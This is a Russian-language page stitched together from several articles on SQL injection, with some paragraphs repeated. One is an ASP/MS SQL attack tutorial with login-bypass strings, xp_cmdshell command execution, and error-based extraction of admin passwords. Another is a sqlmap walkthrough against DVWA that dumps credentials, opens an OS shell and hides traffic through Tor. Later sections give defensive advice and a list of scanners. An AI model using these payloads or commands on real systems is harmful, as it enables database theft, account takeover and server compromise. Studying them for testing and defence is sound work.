Sql инъекции что это: SQL injection для начинающих. Часть 1 / Хабр

SQL Injection для чайников, взлом ASP+MSSQL

Эта статья не содержит никаких новых истин, SQL injection широко описан и повсеместно используется. Статья больше предназначена для новичков, но, быть может, и профессионалы смогут найти одну-две новые уловки.

Эта статья предназначена для того, чтобы помочь новичкам справиться с проблемами, с которыми они могут столкнуться при использовании техники SQL Injection, успешно использовать ее и уметь защитить себя от подобных нападений.

Введение

Когда у интересующего сервера открыт только 80 порт, и сканер уязвимостей не может сообщить ничего интересного, и вы знаете, что системный администратор всегда очень оперативно устанавливает все заплаты на web-сервер, последним нашим шансом остается web-взлом. SQL injection — один из типов web-взлома, которые используют только 80 порт, и может сработать, даже при своевременно установленных заплатах. Это нападение более направлено на web-приложения (типа ASP, JSP, PHP, CGI, и т.

Эта статья не содержит никаких новых истин, SQL injection широко описан и повсеместно используется. Статья больше предназначена для новичков, но, быть может, и профессионалы смогут найти одну-две новые уловки. Также рекомендую просмотреть приведенные в конце статьи ссылки для получения более подробной информации от специалистов в данной области.

1.1 Что такое SQL Injection?

SQL Injection — метод, предназначенный для введения SQL запросов/команд через web-страницы. Многие web-страницы используют параметры, представленные Web пользователям, и делают SQL запрос базы данных. Возьмем для примера случай с логином пользователя, когда имеется web-страница c именем и паролем и производится SQL запрос в базе данных, для осуществления проверки, имеется ли зарегистрированный пользователь с таким именем и паролем. С использованием SQL Injection можно послать придуманное имя пользователя и/или поле пароля, изменяющее SQL запрос, что может предоставить нам кое-что интересное.

 2.0 Что мы должны искать

Попробуйте найти страницы, которые запрашивают у вас данные, например страница поиска, обсуждений, и т.д. Иногда html страницы используют метод POST, чтобы послать команды другой Web странице. В этом случае вы не увидите параметры в URL. Однако в этом случае вы можете искать тэг «FORM» в исходном коде HTML страниц. Вы найдете, что-то типа такого:

<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>

Все параметры между <FORM> и </FORM> потенциально могут быть уязвимы к введению SQL кода.

2.1 Что если вы не нашли страницу, которая использует ввод?

Поищите страницы, подобно ASP, JSP, CGI, или PHP Web страницам. Попробуйте найти страницы, которые используют параметры, подобно:

http://securitylab.ru/?ID=31610

3.0. Как мне проверить что то, что я нашел, уязвимо?

Попробуйте начать с одиночной кавычки. Введите следующую строку:

hi’ or 1=1—

в поле имя пользователя или пароль, или даже в URL параметре. Пример:

Login: hi’ or 1=1—
Pass: hi’ or 1=1—
http://duck/index.asp?id=hi’ or 1=1—

Если вы делали это со скрытым полем, только загрузите исходный HTML, сохраните его на жестком диске, измените URL и скрытое поле соответственно. Пример:

<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value=»hi’ or 1=1— «>

</FORM>

Если удача на вашей стороне, вы войдете в систему без имени или пароля.

3.1 Но почему ‘ or 1=1—?

Давайте рассмотрим другой пример, который объясняет полезность конструкции ‘ or 1=1— . Кроме обхода регистрации, также можно рассмотреть дополнительную информацию, которая обычно не доступна. Рассмотрим asp страницу, которая ссылается на другую страницу со следующим URL:

http://duck/index. asp?category=food

В URL, ‘category’ – это имя переменной, и ‘food’ – значение, назначенное этой переменной. Чтобы это сделать, asp страница может содержать следующий код:

v_cat = request(«category»)

как видно, наша переменная будет объединена с v_cat и таким образом SQL запрос должен стать:

SELECT * FROM product WHERE PCategory=’food’

Этот запрос должен возвратить набор, содержащий одну или более строк, которые соответствуют условию WHERE, в этом случае ‘food’. Теперь изменим URL следующим образом:

http://duck/index.asp?category=food’ or 1=1—
SELECT * FROM product WHERE PCategory=’food’ or 1=1—‘

Этот запрос возвратит все строки в таблице product, независимо от того, Pcategory равен ‘food’ или нет. Двойная черточка «-» сообщает, что MS SQL сервер игнорирует остальную часть запроса, которая следует за одиночной кавычкой (‘). Иногда можно заменить двойную черточку на диез «#».

Однако, если используется не SQL сервер, или вы не можете игнорировать остальную часть запроса, пробуйте:

‘ or ‘a’=’a

Теперь SQL запрос станет:

SELECT * FROM product WHERE PCategory=’food’ or ‘a’=’a’

Этот запрос возвратит тот же самый результат.

В зависимости от фактического SQL запроса, вероятно, придется пробовать некоторые из этих возможностей:

‘ or 1=1—
» or 1=1—
or 1=1—
‘ or ‘a’=’a
» or «a»=»a
‘) or (‘a’=’a

4.0 Как можно удаленно выполнять команды, используя SQL injection?

Возможность вводить SQL команду обычно означает, что мы можем выполнять SQL запросы по желанию. Заданная по умолчанию инсталляция MS SQL Server выполняется с системными правами. Мы можем вызвать встроенные процедуры, типа master..xp_cmdshell, для удаленного выполнения произвольных команд:

‘; exec master. .xp_cmdshell ‘ping 10.10.1.2’ —

Попробуйте использовать двойные кавычки («), если (‘) не срабатывает.

Точка с запятой закончит текущий SQL запрос и позволит вам запускать новые SQL команды. Чтобы проверить, выполнена ли команда успешно, вы можете проверить ICMP пакеты в 10.10.1.2, присутствуют ли в них какие либо пакеты с уязвимого сервера:

http://securitylab.ru/?ID=31610

Если вы не получили никакой запрос утилиты ping от сервера, и получаете сообщение об ошибке, указывающее ошибку разрешения, возможно, что администратор ограничил доступ Web пользователя к сохраненным процедурам.

5.0 Как получить результаты моего SQL запроса?

Можно использовать sp_makewebtask, чтобы записать ваш запрос в HTML:

‘; EXEC master..sp_makewebtask «\\10.10.1.3\share\output.html», «SELECT * FROM INFORMATION_SCHEMA.TABLES»

Указываемый IP должен иметь папку «share» с доступом для Everyone.

6.0 Как получить данные из базы данных, используя ODBC сообщение об ошибках?

Мы можем использовать информацию из сообщения об ошибке, произведенной SQL сервером, чтобы получить любые данные. Например, рассмотрим следующую страницу:

http://duck/index.asp?id=10

Теперь мы попробуем объединить целое ‘10’ с другой строкой в базе данных:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES—

Системная таблица INFORMATION_SCHEMA.TABLES содержит информацию всех таблиц на сервере.

Поле TABLE_NAME очевидно содержит имя каждой таблицы в базе данных. Она была выбрана, потому что мы знаем, что она всегда существует. Наш запрос:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES—

Этот запрос возвратит первое имя в базе данных. Когда мы UNION это строковое значение к целому 10, MS SQL Server попытается преобразовать строку nvarchar к integer. Это вызовет ошибку, которая сообщит, что не может преобразовать nvarchar к int. Сервер выдаст следующую ошибку:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘table1’ to a column of data type int.
/index.asp, line 5

Сообщение об ошибке содержит информацию о значении, которое не может быть преобразовано в целое. В этом случае, мы получили имя первой таблицы — «table1».

Для получения следующего имени таблицы, мы можем использовать следующий запрос:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (‘table1’)—

Мы также можем искать данные, используя ключ LIKE:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ‘%25login%25’—

Выдаст:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin_login’ to a column of data type int. /index.asp, line 5

Соответствующая конструкция ‘%25login%25’ будет заменена на %login% в SQL сервере. В этом случае, мы получим имя таблицы, которая соответствует критерию «admin_login».

6.1 Как узнать все имена столбцов в таблице?

Мы можем использовать таблицу INFORMATION_SCHEMA.COLUMNS, чтобы отобразить все имена столбцов в таблице:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’—

Выдаст:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘login_id’ to a column of data type int.
/index.asp, line 5

Теперь, когда мы узнали первое имя столбца, мы можем использовать NOT IN(), чтобы получить имя следующего столбца:

http://duck/index. asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (‘login_id’)—

Выдаст:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘login_name’ to a column of data type int.
/index.asp, line 5

Продолжая, мы получим остальные имена столбцов, т.е. «password», «details», пока не получим следующую ошибку.

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (‘login_id’,’login_name’,’password’,details’)—

Выдаст:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

6.2. Как нам получить нужные нам данные?

Теперь, когда мы идентифицировали некоторые важные таблицы, мы можем использовать ту же самую методику, что бы получить информацию из базы данных.

Давайте получим первый login_name из таблицы «admin_login»:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login—

Выдаст:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘neo’ to a column of data type int.
/index.asp, line 5

Теперь мы знаем, что есть admin пользователь с именем входа в систему «neo». Наконец, мы можем получить пароль «neo»:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’neo’—

Выдаст:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘m4trix’ to a column of data type int.
/index.asp, line 5

Теперь мы сможем войти в систему как «neo» с паролем ‘m4trix’.

6.3 Как получить числовое значение строки?

Есть ограничение в методе, описанном выше. Мы не сможем получить сообщение об ошибке, если мы попробуем преобразовать текст, который состоит из числа (только символы между 0…9). Сейчас мы опишем получение пароля «31173» у пользователя «trinity»:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’trinity’—

Мы вероятно получим ошибку «Page Not Found». Причина в том, что пароль «31173» будет преобразован в число, перед UNION с целым числом ( в нашем случае 10). Так как получится правильное UNION выражение, SQL сервер не выдаст сообщение об ошибке, и таким образом мы не сможем получить числовую запись.

Чтобы решить эту проблему, мы можем добавить в конец числовую строку с некоторыми буквами, чтобы преобразование не прошло. Измененный запрос:

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b’%20morpheus’) FROM admin_login where login_name=’trinity’—

Мы просто используем знак «плюс» (+) для того, чтобы добавить в конец пароль с любым текстом (ASSCII кодирование для ‘+’ = 0x2b). Затем, мы добавим в конец ‘%20morpheus’ в фактический пароль. Поэтому, даже если значение пароля ‘31173’, он станет ‘31173 morpheus’. Вручную вызывая функцию convert(), пытаясь преобразовать ‘ 31173 morpheus’ в целое число, SQL Сервер выдаст ODBC сообщение об ошибке:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘31173 morpheus’ to a column of data type int.
/index.asp, line 5

Теперь мы сможем войти в систему как «trinity» с паролем ‘31173’.

7.0 Как модифицировать/вставить данные в базу данных?

После того, как мы получили имена всех столбцом в таблице, мы сможем обновить(UPDATE) или даже вставить (INSERT) новую запись в таблицу. Например, мы можем изменить пароль для «neo»:

http://duck/index.asp?id=10; UPDATE ‘admin_login’ SET ‘password’ = ‘newpas5’ WHERE login_name=’neo—

Чтобы внести (INSERT) новую запись в базу данных:

http://duck/index.asp?id=10; INSERT INTO ‘admin_login’ (‘login_id’, ‘login_name’, ‘password’, ‘details’) VALUES (666,’neo2′,’newpas5′,’NA’)—

Теперь мы сможем войти в систему как «neo» с паролем ‘newpas5’.

8.0 Как избежать SQL Injection?

Фильтруйте специальные символы во всех строках в:

— любых данных, вводимых пользователем
— URL параметрах
— Cookie

Для числовых значений, конвертируйте их к integer, перед передачей их к SQL запросу. Или используйте ISNUMERIC, чтобы удостовериться это целое число.

Запускайте SQL сервер как непривилегированный пользователь.

Удалите неиспользуемые сохраненные процедуры: master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

Использование SQLMap | DefconRU

SQL Injection – это тип атаки, при котором злоумышленник изменяет логику SQL запросов веб-приложения, что позволяет ему читать/изменять/удалять значения в базе данных, а иногда – выполнять произвольный код на стороне сервера. В статье будет рассмотрена популярная утилита sqlmap для проведения sql-инъекций.

На данный момент, данный тип уязвимости является наиболее опасным из всех возможных. На протяжении 7 лет, лидирующую строчку «OWASP TOP-10» возглавляют именно SQL инъекции.

Существует 5 основных причин возникновения этой уязвимости:

1. Недостаточный уровень или отсутствие валидации входных параметров, в особенности пользовательского ввода. «Любой входной параметр — зло»
2. Необоснованный и слабозащищенный доступ к базам данных. В эту категорию входят такие факторы как: большое количество администраторов и супер-пользователей (root), слабая система аутентификации, большое количество прав для второстепенных администраторов и т.д.
3. Архитектура. Использование устаревших технологий, отсутствие контрольных мер, пренебрежение методологией «моделирование угроз».
4. Наследственность заведомо уязвимого кода, использование готовых решений с низким уровнем безопасности.
5. Отсутствие должного уровня абстрагированности исполняемого кода от данных.

Типы SQL инъекций.

Рассмотрим типы SQL инъекций эксплуатируемые утилитой SQLMap:

1. Boolean Based Blind SQL Injection
   • Метод, при котором HTTP-запросы и ответы считываются посимвольно для обнаружения уязвимости.
   • Как только уязвимый параметр обнаружен, SQLMap заменяет или добавляет синтаксически правильные операторы SQL, ожидая реакции выполнения этого кода сервером.
   • SQLMap сравнивает оригинальный валидный запрос с ответом от запроса с внедрённым зловредным кодом.
   • SQLMap использует алгоритм деления пополам (bisectional algorithm) для выборки каждого символа ответа с использованием максимум семи HTTP-запросов.
   • Там, где ответ отдаётся не в чистом тексте, SQLMap адаптирует алгоритм большими значениями для определения ответа.
2. Time-Based Blind SQL Injection
   • Метод Time Based сам по себе предполагает, что существует некоторое сравнение на основе времени запроса и ответа путем инъекции синтаксически правильного оператора SQL в уязвимый параметр.
   • SQLMap использует операторы SQL, которые помещают базу данных в режим ожидания для возврата на определенное количество времени.
   • Использует тот же алгоритм bisectional algorithm, чтобы выводить символ за символом, SQLMap сравнивает время ответа HTTP с исходным запросом.
3. Error-Based SQL Injection
   • SQLMap использует операторы SQL, которые могут спровоцировать генерацию специфической ошибки.
   • Утилита ищет ошибки в HTTP-ответе сервера.
   • Этот метод работает только в том случае, если веб-приложение настроено на раскрытие сообщений об ошибках.
4. UNION Query
   • Вводимый SQL оператор UNION ALL SELECT.
   • SQL-инъекция, основанная на запросах UNION, работает на основе поведения приложения, т.е. когда приложение передает результат письменного запроса SELECT через определенный цикл или строку инструкций, которые позволяют выводить выходные данные на содержимое страницы.
   • В случае, если вывод не циклируется через какой-либо цикл for или другую строку операторов, SQLMap использует однократную инъекцию запроса UNION.
5. Stacked Query
   • Использование сложенных запросов. SQLMap добавляет точку с запятой (;) в значение уязвимого параметра и добавляет инструкцию SQL, которая должна быть выполнена.
   • Используя эту технику, можно выполнять SQL-выражения, отличные от SELECT. Это полезно для манипуляции данными, получения доступа на чтение и запись и, наконец, захвата операционной системой.
6. Out-Of-Band
   • В этом методе используется вторичный или другой канал связи для вывода результатов запросов, запущенных в уязвимом приложении.
   • Например, вставка выполняется в веб-приложение, а вторичный канал, такой как DNS-запросы, используется для пересылки данных обратно на домен злоумышленника.

Базовое использование SQLMap.

Запуск утилиты (должна находиться в переменной PATH):

$ sqlmap

Или из директории утилиты:

$ python sqlmap.py

Для вызова документации используется ключ «-h / —help»:

$ sqlmap --help

$ python sqlmap. py –help

Действия ключей SQLMap полностью зависят от того, чего конкретно хочет добиться злоумышленник. Основной список действий SQLMap выглядит следующим образом:

• Перечислить информацию о базе данных, такую как имя, версию и другие детали.
• Выбрать определённую базу для перечисления информации о имеющихся в ней таблиц.
• Выбрать таблицу и перечислить информацию о столбцах.
• Выбрать столбец и перечислить строки для извлечения их значений.
• Дальнейшая эксплуатация.

Для нашей практической подготовки мы будем использовать Damn Vulnerable Web Application (DVWA или «Чертовски уязвимое веб приложение»).

DVWA – это свободно распространяемое веб-приложение построенное на таких технологиях как PHP и MySQL, предназначенное для тренировки навыков пентеста.

Сейчас нас интересуют только инъекции, но в целом, вы можете проверить свои способности в остальных уязвимостях, созданных на основе официального OWASP TOP-10.

P.S.: Эта практика подразумевает наличие у вас знания основ Linux, начального уровня английского языка и умение использовать Google (в случае неимения вышеперечисленных навыков).

Установка:

• Скачиваем приложение и следуем инструкциям;
• Меняем уровень сложности на LOW;
• Интересуемся только вкладками “SQL Injection”;

Начальные данные:

• Веб сервер в приватной сети
• Уязвимый URL: http://your—host.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
• Уязвимый параметр: id

Итак, приступим:

1. Подтверждаем наличие SQL инъекции:

./sqlmap.py --url=”http://192.168.152.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee"

Пояснение к команде:

— url – URL с предполагаемым уязвимым параметром. Важно заметить, что переменная этого ключа записана в кавычках, т.к. проверяемый URL имеет больше одного передаваемого параметра. В противном случае кавычками можно пренебречь и использовать короткий вариант ключа “-u” без знака равенства.

— cookie – Сессионная куки для прямого доступа во время атаки (необязательный ключ).

Вывод:

Анализ: Основываясь на ответе SQLMap отмечаем следующие моменты:

• Приложение уязвимо к SQL инъекции
• Тип инъекции – UNION Query
• Back-end база данных(DBMS) – MySQL5
• Технические детали ОС — Linux Ubuntu 8.04, PHP 5.2.4, Apache 2.2.8

2. Перечисляем названия баз данных:

./sqlmap.py --url="http://192.168.152.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" –dbs

Пояснение к команде:

—dbs – ключ для перечисления имеющихся баз данных.

Вывод:

Анализ: SQLMap перечислил доступные базы данных (всего 7).

3. Перечисляем названия таблиц (бд — dvwa):

./sqlmap.py --url="http://192.168.152.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D dvwa –tables

Пояснение к команде:

—D – Указываем интересующую нас базу данных.

—tables – Перечисляем имеющиеся таблицы в бд.

Вывод:

Анализ: Как мы видим, SQLMap успешно перечислил названия 2-х таблиц в бд dvwa.

4. Дальнейшее перечисление названий столбцов таблицы “users”:

./sqlmap.py --url="http://192.168.152.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D dvwa -T users –columns

Пояснение к команде:

—T – Указываем интересующую нас таблицу.

—columns – Перечисляем имеющиеся колонки в таблице.

Вывод:

Анализ: Как мы видим, SQLMap успешно перечислил названия 6-х колонок в таблице users, бд dvwa.

5. Перечисляем/вытягиваем значения из таблицы “users”:

./sqlmap.py --url="http://192.168.152.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D dvwa -T users -C user_id,user,password --dump

Пояснение к команде:

-С – Указываем интересующие нас столбцы.

—dump – Вытягиваем значения из перечисленных столбцов.

Вывод:

Анализ: Основываясь на ответе SQLMap отмечаем следующие моменты:

• SQLMap извлекает записи из указанных столбцов и затем анализирует данные, содержащиеся в этих столбцах.
• Как только данные распознаются как возможные хэши паролей, SQLMap пытается попытаться взломать хэш, используя различные алгоритмы хеширования.
• В этом случае хеш — MD5, поэтому с помощью самой первой хеш-техники, которую использует инструмент, он может успешно взламывать хэши и выдавать хорошо отформатированный ответ.
• Кроме того, инструмент сохраняет перечисленные записи в файле формата «.csv» для дальнейшего использования; Поэтому вам не нужно выгружать данные в текстовый файл или делать скриншот, SQLMap позаботится об этом.

6. Дальнейшая эксплуатация и захват сервера (ASP, не входит в состав DVWA):

./sqlmap.py --url="http://192.168.152.129/login.asp" --data="txtLoginID=shrikant&txtPassword=password&cmdSubmit=Login" --os-shell

Пояснение к команде:

—data – Указываем параметры для тестирования, передающиеся в POST запросе.

—os—shell – Специальный ключ для попытки эксплуатации серверной консоли через SQL инъекцию.

Вывод:

Анализ: Основываясь на ответе SQLMap отмечаем следующие моменты:

• После подтверждения и эксплуатации SQL-инъекции, SQLMap проверяет, является ли пользователь DBA (Data Base Administrator).
• После этого инструмент попытался использовать расширенную хранимую процедуру — «xp_cmdshell», которая обычно используется SQL Server 2000.
• «xp_cmdshell» используется для выполнения заданной командной строки в качестве команды операционной системы. В свою очередь, он выводит результат как стандартный текст.

Преимущества получения более глубокого уровня доступа к системе:

• Доступ к учетным данным пользователя или хэшам паролей.
• Интерактивная оболочка, которая позволит вам загружать или выгружать файлы с сервера.
• Запуск осевых команд (ОS) для изучения внутренней сети.
• Возможность загрузки малвари.
• Дальнейшая эксплуатация с помощью Metasploit Framework.
• Создание и залив бэк-доров.

1.  SQLMap и SOAP (Simple Object Access Protocol) запросы: Процесс анализа запросов SOAP довольно прост:
   • Захват вашего SOAP-запроса.
   • Сохранение его в текстовый файл вместе с возможными уязвимыми параметрами.
   • Используйте нижеприведенную команду для SQLMap вместе с опцией -p, если вам известен уязвимый параметр:

$ ./sqlmap.py -r So_request.txt -p <vulnerable parameter>

• SQLMap автоматически проанализирует запрос SOAP и попытается проникнуть в уязвимый параметр.

2. SQLMap и JSON (JavaScript Object Notation) запросы: В аналогичных сценариях использования SQLMap для SOAP-запросов, JSON-запросы тоже могут анализироваться и эксплуатировать. Для запроса типа JSON, SQLMap предложит вам эксплуатировать уязвимость обнаружив тип запроса JSON в «файле запроса». Как только вы ответите утвердительно, инструмент проанализирует запрос и выберет свой собственный вектор атаки.
3. SQLMap и прокси-сервер: Корпоративные типы сетей обычно защищены и контролируются с использованием контролируемых прокси-серверов для всего входящего или исходящего трафика. В таких случаях у вас есть возможность добавить параметр прокси прямо к опции SQLMap для связи с целевым URL. Хотя SQLMap является инструментом командной строки, он обменивается данными через HTTP-протокол, следовательно, если вы установите HTTP-прокси для соответствующего интернет-соединения, SQLMap примет его за основу:

$ ./sqlmap.py --proxy=http://<proxy-ip>:<proxy-port>

2. SQLMap и WAF (Web Application Firewall): WAF является дополнительным уровнем защиты веб-приложений, значительно усложняя анализ и эксплуатацию стандартными методами имеющимися в SQLMap. Для этого существует функция “tamper—script”, которая значительно упрощает работу с веб-приложениями, находящимися за WAF’ом.
3. SQLMap и анонимность: Если вы хотите скрыть свою личность и представиться анонимом для целевого приложения, вы можете использовать прокси-сервер TOR (The Onion Router). В SQLMap вы можете настроить прокси-сервер TOR для скрытия источника, из которого генерируется трафик или запрос следующими ключами:
   • — tor – переключение утилиты в режим использования TOR-прокси.
   • —— tor—type – ручная настройка протокола TOR-прокси (HTTP/SOCKS4/4a/5).
   • —— check—tor – проверка работоспособности TOR-прокси

Тестирование безопасности: SQL-инъекции | Бесплатные онлайн-курсы от компании QATestLab

В данной статье разберемся с основными понятиями SQL-инъекций, рассмотрим некоторые часто встречающиеся примеры, объясним как находить и использовать различные виды уязвимостей, а также в нескольких словах изложим, как предотвратить ввод SQL кода.

Основные понятия

Инъекции кода (Code injections), (SQL, PHP, ASP и т.д.) – это вид уязвимости, с которой появляется вероятность запустить на исполнение код с целью получения доступа к ресурсам системы, взлома личных данных или повреждения программного обеспечения.

SQL-инъекция (Structured Query Language Injection) – это один из самых часто используемых способов взлома продуктов, взаимодействующих с базами данных. Суть таких инъекций – внедрить в данные (передаваемые через GET, POST запросы) любой случайный SQL код. Если ресурс принимает и выполняет такие инъекции, значит он уязвим, и, по сути, с базой данных можно поступать как угодно.

Причины внедрения

Уязвимости внедрения SQL возникают после того, как контролируемые пользователем данные небезопасным способом включаются в запросы к базе данных. Злоумышленник может предоставить специально созданный ввод, чтобы вырваться из контекста данных, в котором они отображаются и вмешаться в структуру окружающего запроса.

Внедрение SQL часто может быть выполнено с помощью целого ряда вредоносных атак, включая чтение или изменение критически важных данных приложения, вмешательство в логику приложения, повышение привилегий в базе данных и получение контроля над сервером базы данных.

Каково влияние успешной атаки SQL-инъекцией?

Успешная атака с использованием SQL-инъекций может привести к несанкционированному доступу к конфиденциальным данным (например, пароли, данные кредитной карты или другие личные данные пользователя). В последние годы многие громкие утечки данных стали результатом атак с использованием именно SQL-инъекций, что привело к ущербу для репутации и штрафам со стороны регулирующих органов. В некоторых случаях злоумышленник может получить постоянный канал в системы организации, что приведет к долгосрочной уязвимости, которая может оставаться незамеченной в течение длительного периода.

Некоторые часто встречаемые примеры внедрения SQL:

• получение скрытых данных, где запрос SQL изменяется с целью получения дополнительных результатов;
• подрыв логики приложения, где изменяется запрос, чтобы мешать логике приложения;
• UNION атаки, где можно получить данные из разных таблиц базы данных;
• изучение базы данных, где извлекается информация о версии и структуре базы данных;
• слепое внедрение SQL, когда результаты запроса не возвращаются в ответах приложения.

На основе UNION атаки разберем конкретный пример.

Данный тип атаки возможен в тех случаях, когда результаты SQL запроса возвращаются в ответах приложения. Злоумышленник, используя внедрения SQL, может извлечь дополнительные данные из других таблиц в базе данных. Оператор UNION позволяет выполнить дополнительный запрос SELECT и добавить результаты в исходный запрос.

Например, приложение выполняет запрос на получение информации о доступных подарочных картах в разделе «Gifts»:

SELECT name, description FROM products WHERE category = ‘Gifts’

Злоумышленник добавляет дополнительный запрос для получения пользовательских данных:

‘UNION SELECT username, password FROM users—

Сервер приложения обрабатывает запрос и отправляет в базу данных уже вот такой запрос: 

SELECT name, description FROM products WHERE category = ‘Gifts’ UNION SELECT username, password FROM users—

В результате чего злоумышленник получит не только название и описание продуктов, но и вместе с этим информацию об именах и паролях пользователей сайта или приложения.

Большинство уязвимостей SQL-инъекций можно быстро и надежно выявить с помощью разных сканеров веб-уязвимостей (например: Burp Suite, OWASP ZAP).

Внедрение SQL также можно обнаружить вручную, используя систематический набор тестов для каждой точки входа в приложение. Как правило, это включает в себя:

• отправка символа одинарной кавычки ‘ и поиск ошибок или других аномалий;
• отправка некоторых специфичных для SQL синтаксисов, которые оценивают базовые значения точки входа и поиск систематических различий в полученных ответах приложения;
• отправка логических условий, таких как OR 1 = 1 и OR 1 = 2, и поиск различий в ответах приложения;
• отправка полезных данных, предназначенных для запуска временных задержек при выполнении в запросе SQL, и поиск различий во времени, необходимого для ответа.

Способы защиты от SQL-инъекций

Избежать возможности подобных проблем довольно просто. Достаточно просто проверять данные содержащиеся в запросах несложным обработчиком. Следует отделять данные от команд и запросов, для этого существует несколько способов:

1. Использование безопасного API, который исключает применение интерпретатора или предоставляющий параметризованный интерфейс. Можно использовать инструменты объектно-реляционного отображения (ORM).
2. Реализация белых списков на сервере с целью проверки входящих данных. Конечно, данный метод не обеспечит полную защиту, поскольку многие приложения используют спецсимволы (например, в текстовых областях или API для мобильных приложений).
3. Следует также внедрить экранирование спецсимволов для остальных динамических запросов, используя соответствующий интерпретатору синтаксис. Примечание: элементы SQL структуры, такие как названия таблиц или столбцов, нельзя экранировать, поэтому предоставляемые пользователями названия представляют опасность. Это частая проблема платформ для составления отчетов.
4. Используйте в запросах элементы управления SQL для предотвращения утечек данных.

Абсолютно безопасных систем не существует, можно лишь снизить вероятность взлома. Для предотвращения инъекций, необходимо тщательно проверять полученные параметры от пользователя любыми доступными способами. Можно даже попробовать взломать собственный сайт, чтобы узнать, какие у него есть уязвимости: ввести инъекции, изменить тип данных, добавить в поля знаки экранирования, загрузить на сайт файл .php с вредоносным кодом и тому подобное. Лучше сделать это самостоятельно и предотвратить взлом, пока кто-то не сработал на опережение.

Как найти уязвимость к SQL-инъекции – Information Security Squad

Протестируйте свой веб-сайт на атаку с использованием SQL инъекции и препятствуйте тому, чтобы он был взломан.

SQLi (Инъекция SQL) является старым методом, где хакер выполняет вредоносные SQL-операторы, чтобы завладеть веб-сайтом.

SQLi может быть опасным, поскольку она может использоваться, чтобы украсть уязвимую информацию, такую как как кредитная карта, пароль, и т.д.

Начиная с SQL (Язык структурированных запросов) база данных поддерживается многими веб-платформами (PHP, WordPress, Joomla, и т.д.), оан может потенциально использоваться для большого количества веб-сайтов.

1. SQL Injection тестирование с использованием  Sqlmap

Онлайн SQLMAP от FPentest identify идентифицируют систему баз данных,и выполняет тестирование на следующие шесть методов инжекции SQL:

• Time-based blind
• Error-based
• UNION query-based
• Boolean-based blind
• Stacked queries
• Out-of-band

2. suIP.biz

Обнаружение уязвимости к SQL инъекции можно выполнить  онайлайн на suIP.biz поддерживающее: MySQl, Oracle, PostgreSQL, Microsoft SQL, IBM DB2, Firebird, Sybase, и т.д.

Оно так же осуществляет сканирование при помощи SQLMap теми же шестью инъекционными методами.

3. Acunetix

Acunetix проверяет ваш веб-сайт  на больше чем 3000 слабых мест, включая инъекцию SQL.

Если вы хотите сжатый просмотр состояния безопасности, то попробуйте Acunetix.

Acunetix обеспечивает подробный отчет, где вы можете отфильтровать параметры риска на основе серьезности, чтобы расположить их по приоритетам.

4. SQL Injection Test Online

Другой онлайновый инструмент Hacker Target на основе SQLMap находит уязвимости, связанные с HTTP-запросом GET.

5. Scan My Server

Scan My Server от Beyond Security является СВОБОДНЫМ сканером и может протестировать ваш веб-сайт на вредоносное программное обеспечение, XSS уязвимости , инъекцию SQL и другие уязвимости.

6. Vega

Vega – это свободное программное обеспечение [ сканер безопасности ] с открытым исходным кодом, которое может быть установлено на Linux, OS X и Windows.

Vega написан на Java и базируется он на GUI.

Не только для SQLi, но также вы можете использовать Vega, чтобы протестировать много других уязвимостей, таких как:

XML/Shell/URL инъекция
Перечисление каталогов
Включение удаленного файла
XSS

